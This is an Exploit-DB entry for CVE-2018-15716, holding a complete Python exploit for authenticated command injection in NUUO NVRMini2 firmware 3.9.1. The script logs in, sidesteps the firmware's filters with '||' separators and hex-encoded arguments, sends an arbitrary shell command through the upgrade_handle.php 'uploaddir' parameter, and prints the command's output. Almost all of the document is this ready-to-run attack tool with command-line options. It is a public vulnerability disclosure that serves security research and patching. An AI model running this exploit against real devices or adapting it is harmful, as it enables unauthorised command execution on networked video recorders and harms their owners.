NUUO NVRMini2 3.9.1 - Authenticated Command Injection

EDB-ID:

45948


Platform:

PHP

Published:

2018-12-04

# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
# Date: December 3, 2018
# Exploit Author: Artem Metla
# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
# Version: 3.9.1
# Tested on: NUUO NVRMini2 with firmware 3.9.1
# CVE : CVE-2018-15716
# Advisory: https://www.tenable.com/security/research/tra-2018-41

import argparse
import requests
import urllib.parse
import binascii
import http.cookiejar as cookielib
import re


def run(target, username, password, command):
    """ Authenticate us and execute exploitation """
    # Step 1. Authentication
    payload = {'language':'en', 'user':username, 'pass':password,
'submit':'Login'}
    r = requests.post(urllib.parse.urljoin(target, 'login.php'),
data=payload, verify=False, allow_redirects=False)

    jar = r.cookies

    # Step 2. Prepare a payload

    # We're bypassing 2 filters:
    # 1) Instead of using ";" we can try || or &&, to bypass:
    #    if(strpos($uploaddir, ';') !== false)
    #    {
    #      die('[1]Not a valid path.');
    #    }

    # 2) To bypass this:
    #    $cmd = "sed -i 's/".str_replace('/', '\/',
$current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g'
".PHP_CINF_PATH;
    #    we have to HEX encode a payload
    #
    #    Simple example of payload that we're trying to achieve: '||ls`echo
-e "\\x20\\x2f"`||' to execue: ls /

    # 3) Multiple parameters commands are not supported yet, but the same
techique could be used for them

    # Primitive Bash command parser
    splitted_command = [command]
    for i in range(0, len(command)-1):
        if command[i] == " " and command[i+1] != "-":
            splitted_command = [command[:i], command[i+1:]]
            break

    # Encoding a payload
    if len(splitted_command) == 2:
        payload = "".join('\\\\x%s' %
binascii.hexlify(char.encode('ascii')).decode("utf-8") for char in
splitted_command[1])
        exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0],
payload)
        print("Exploit: %s" % exploit)
    else:
        exploit = '\'||%s||\'' % (splitted_command[0])
        print("Exploit: %s" % exploit)

    # Step 3. Send a payload
    payload = {'cmd':'writeuploaddir', 'uploaddir':exploit}
    r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
params=payload, verify=False, cookies=jar)

    # Step 4. Output processing to grab only needed output
    res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
    if res:
        print(res.group(1).replace('\\n', '\n'))


def main():
    """ Parse command line arguments and start exploit """
    parser = argparse.ArgumentParser(
            add_help=False,
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username
-p password -c whoami")

    # Adds arguments to help menu
    parser.add_argument("-h", action="help", help="Print this help message
then exit")
    parser.add_argument("-t", dest="target", required="yes", help="Target
URL address like: https://localhost:443/")
    parser.add_argument("-u", dest="username", required="yes",
help="Username to authenticate")
    parser.add_argument("-p", dest="password", required="yes",
help="Password to authenticate")
    parser.add_argument("-c", dest="command", required="yes", help="Shell
command to execute")

    # Assigns the arguments to various variables
    args = parser.parse_args()

    run(args.target, args.username, args.password, args.command)


#
# Main
#

if __name__ == "__main__":
    main()